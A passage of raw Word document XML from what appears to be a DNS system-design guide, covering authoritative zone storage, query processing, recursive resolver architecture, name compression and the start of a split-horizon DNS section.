        <w:t> A text file containing all records. Loaded into memory at startup. Simple but doesn't scale well to millions of records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F84FDF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="790"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-backed:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Records stored in SQL/NoSQL database. Queries resolved at runtime. Scales to massive zones (like TLD servers managing millions of domains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D0AA8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="790"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In-memory with persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Records loaded into optimized in-memory data structures (hash tables, tries) for O(1) lookup. Persisted to disk for durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EB769" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query processing flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EEB99" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Receive UDP packet on port 53.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE105C1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Parse the DNS message (header, question section).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A6874B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Determine if this server is authoritative for the queried zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A11B57" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Look up the name in the zone data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A2C34D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Exact match → return the record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B53FD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Wildcard match (*.example.com) → synthesize a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741E3DC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Delegation → return NS referral (this name is delegated to another server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF2553" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>NXDOMAIN → name doesn't exist, return negative response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D78FAE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If DNSSEC-enabled: attach RRSIG records to the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AFFEB2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="791"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Construct response message, send UDP reply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CACF80" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A single BIND instance on modern hardware can handle 100,000+ queries/second. Optimized implementations (Knot DNS, NSD) exceed 1,000,000 qps per core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47873D5D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Recursive Resolver Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49E6CA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Much more complex than authoritative servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70278A3A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EED1C6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>┌─────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF278C3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│              Recursive Resolver                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740FB6E4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E831CE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│  [Listener] → [Query Parser] → [Cache Check]    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB71BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│                                     │            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D771EC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">│                              Hit?   </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Yes </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Return cached response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A33CA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│                                     │            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1AA0C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│                                     └── No  → [Iterative Resolution Engine]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754543C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D463D0C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│       ┌──────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0FD0F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18DA20" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│  [Resolution Engine]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D74E7E0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│   1. Check root hints → query root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F04595" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│   2. Follow referrals → query TLD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA2A5D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│   3. Follow referrals → query authoritative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F280555" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│   4. Validate DNSSEC (if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6155A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│   5. Cache result (with TTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A200EB0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│   6. Return to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE024B2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC8154" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│  [Connection Manager]: maintains UDP/TCP to upstream servers │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A43FD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>│  [DNSSEC Validator]: verifies signature chains    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777F1DE5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│  [Rate Limiter]: prevents abuse                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AAC3FD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>│  [Prefetch Engine]: refreshes popular entries     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2DAD08" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>└─────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53E9DF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concurrency model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FBAF3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A resolver handles millions of queries simultaneously. It must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3B2D4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Track thousands of in-flight iterative resolutions (each needing multiple upstream queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34202B7C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Match incoming responses to their pending queries (transaction ID + source port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130FDED" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Handle timeouts and retries for upstream queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A4AAE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Manage cache concurrency (many threads reading/writing the same cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FF064" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modern resolvers (Unbound, Knot Resolver) use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16961DD9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Event-driven I/O (epoll/kqueue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803C86E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Multi-threaded with per-thread caches (reduce lock contention).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CD915" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Lock-free data structures for shared state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790F284" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Connection reuse (TCP/TLS) to upstream servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB47D67" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Name Compression in DNS Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BD53F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B70C368" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Domain names repeat frequently in DNS messages (the same name appears in question, answer, authority, additional sections). Rather than repeating www.example.com multiple times:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20052774" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pointer compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7493D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>First occurrence: full name stored (\x03www\x07example\x03com\x00).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78515032" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Subsequent occurrences: a 2-byte pointer to the first occurrence's offset in the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E805B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Pointer format: top 2 bits = 11 (indicates pointer), remaining 14 bits = byte offset from message start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F018B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A response with many records for the same domain is significantly smaller. Critical for fitting responses in 512-byte UDP packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB0D36" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="367F95D8">
          <v:rect id="_x0000_i3490" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF690AE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. DNS-Based Architectures in System Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641948A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Split-Horizon DNS (Split DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905795A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concept:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The same domain name resolves to DIFFERENT answers depending on who's asking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D3223" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal vs. external resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F492448" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6401C781" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Query: api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F88B0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="0D3BA633" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>From internal network (10.0.0.0/8):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4463B956" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  → 10.0.5.20 (private IP, direct access to backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9E4AB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="1C565874" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>From external network (internet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C15EF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  → 203.0.113.10 (public IP, goes through load balancer/WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143249B8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it's implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6842CDCA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Two sets of DNS views/zones configured on the nameserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DDB631" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The server checks the source IP of the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A360A7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If from internal range → serve internal view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF9AE4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If from external → serve external view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA60DD2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D07D5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Internal services accessible by private IP (no hairpin through public LB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D24859" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
